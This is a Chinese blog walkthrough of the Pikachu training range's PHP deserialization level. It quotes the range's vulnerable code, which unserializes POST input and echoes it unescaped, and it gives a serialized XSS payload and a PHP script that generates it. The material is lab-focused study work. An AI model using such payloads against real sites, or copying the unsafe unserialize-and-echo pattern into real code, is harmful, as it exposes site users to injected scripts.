pikachu靶场_反序列化

最新推荐文章于 2024-09-13 21:40:38 发布
最新推荐文章于 2024-09-13 21:40:38 发布
阅读量35 收藏
点赞数
分类专栏: 渗透测试漏洞 网络安全 Java 文章标签: java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46390077/article/details/134583799
版权

pikachu靶场_反序列化

打开靶场:

在这里插入图片描述

查看源代码:

class S{
//用户的输入通过POST方法传递给服务器,并被用于调用 `unserialize()` //函数以创建一个名为 `S` 的新对象实例。
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}
 // O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
 
//如果用户输入的是一个有效的 (`O:1:"S":1:{s:4:"test";s:29:")
//<script>alert('xss')</script>";}` 序列化字符串,那么将会触发
//XSS(跨站脚本)攻击,因为该类中的 `$test` 变量被设置为了 //`<script>alert('xss')</script>` 这个恶意脚本。 
 
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }
//需要注意的是,如果用户输入的不是有效的序列化字符串,则不会有任何效果。
//这是因为 `unserialize()` 函数会返回 `false` ,并且会跳过后续的输
//出操作。
}

这里的$s可以进行传参

$s = $_POST['o'];

判断是否能够被反序列化,即上传的参数是否经过序列化

if(!@$unser = unserialize($s))

如果上传的序列化后的参数,将上传的数据反序列化后,自动执行魔术方法 __construct() ,$unser->test 用来输出反序列化后的对象的 test 属性的值到页面上。

构造palyload:

<?php
class S{
    var $test = "*script>alert(/lin/)*/script>";
}
    // 创建一个对象
    $s=new S(); 
    // 把这个对象进行序列化输出
    print_r(serialize($s)); 
?>

执行文件:

发现他执行了文件显示出xss脚本显示不了以序列化的数据

在这里插入图片描述

我们需要更改一下执行文件使用 ***** 将 < 替换一下将*作为 < 占位符

<?php
class S{
    var $test = "*script>alert(/lin/)*/script>";
}
    // 创建一个对象
    $s=new S(); 
    // 把这个对象进行序列化输出
    print_r(serialize($s)); 
?>

执行文件:

在这里插入图片描述

将更换的符号替换回去就实现xss脚本

在这里插入图片描述

爱吃银鱼焖蛋
关注
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
spring事务详细讲解-深入浅出
小电玩
09-08 520
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
Java多线程:深入探索与详细解析
m0_63550220的博客
09-08 1504
作为Java中的基本执行单元,线程是轻量级的进程,由线程ID、程序计数器、Java虚拟机栈、本地方法栈、和线程私有内存等部分组成。每个线程都有独立的执行路径,但共享进程的资源(如内存)。:进程是系统资源分配的基本单位,它包含了一个或多个线程以及这些线程运行所需的资源。在Java中,JVM(Java虚拟机)就是一个进程,而运行在JVM上的多个线程则共享JVM的内存空间。:并发指的是多个任务在同一时间段内交替执行,而并行则指的是多个任务在同一时刻真正同时执行。
自动生成不重复的订单id
ClaireCheney的博客
09-13 132
【代码】自动生成不重复的订单id。
Java集合:Stack详解
yang_brother的博客
09-10 568
Java 中的Stack类是一个后进先出(LIFO, Last In First Out)的数据结构,它继承自Vector类。尽管Stack是一个可用的类,但它被认为是遗留的,并且在新代码中不推荐使用。通常建议使用Deque或ArrayDeque作为替代。
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 599
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
基于SpringBoot的考研资讯平台设计与实现
最新发布
linzhongshu的专栏
09-13 511
对于本次的系统开发来看,它主要是把我以前所学的知识进行了一次综合的应用。经过这次毕业设计的制作它主要是把我以前所学的理论知识应用到社会实践当中。通过这一次的考研资讯平台的设计与实现它能够有效把计算机知识与实际问题相互应用,通过计算机网络技术来解决学生生活当中的实际问题,从而提高我的编程能力。虽然在这次毕业设计当中我遇到了很多的问题和困难,但是通过不断的调试和老师的帮助让我圆满的完成了这次毕业设计。
Linux服务器Java启动脚本
Jack魏
09-08 568
本文章介绍了如何在Linux服务器上执行Java并启动jar包,通常我们会使用nohup直接启动,但是还是需要手动停止然后再次启动,那如何更优雅的在服务器上启动jar包呢,让我们一起探讨一下吧。
MyBatis面试
Tony_yitao的博客
09-09 769
MyBatis面试
springboot数据库连接由localhost改成IP以后访问报错500(2024/9/7
不起眼小菜菜的博客
09-07 363
步骤很详细,直接上教程……
Spring-di基本使用
2301_76862031的博客
09-09 1359
spirngDi环境搭建,使用流程,set注入,构造注入,对象注入,外部引入注入,内部创建注入,外部引入级联赋值注入,list集合注入,map集合注入,util注入
Spring AMQP给消息添加头信息
yong472727322的博客
09-10 214
【代码】Spring AMQP给消息添加头信息。
Java重修笔记 第五十一天 泛型
Code___slave的博客
09-10 389
1. 在类名后面跟上 <泛型列表> 表示该类所使用的使用泛型,具体是什么类型在编译的时候确定2. 可以在属性定义时使用3. 也可以当做返回值E s;V v;this.s = s;return s;this.s = s;
使用API有效率地管理Dynadot域名,查看域名服务器(NS)信息
Dynadot_tech的博客
09-12 805
Dynadot是通过ICANN认证的域名注册商,自2002年成立以来,服务于全球108个国家和地区的客户,为数以万计的客户提供简洁,优惠,安全的域名注册以及管理服务。Dynadot.com提供的API是专为效率而构建的高级域名管理和获取工具包。使用Dynadot API,可以查看某一域名DNS设置的域名服务器(Name server)信息。
Java中项目名、包名、类名、接口名、方法名、类名命名规范(简单示范)
weixin_70495659的博客
09-08 297
【代码】Java中项目名、包名、类名、接口名、方法名、类名命名规范(简单示范)
pikachu反序列化
09-07
反序列化Pikachu对象,你需要使用适当的反序列化方法,通常是根据你使用的编程语言和框架来决定。以下是一个示例,在Python中使用pickle模块进行反序列化的代码: ```python import pickle # 反序列化Pikachu...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值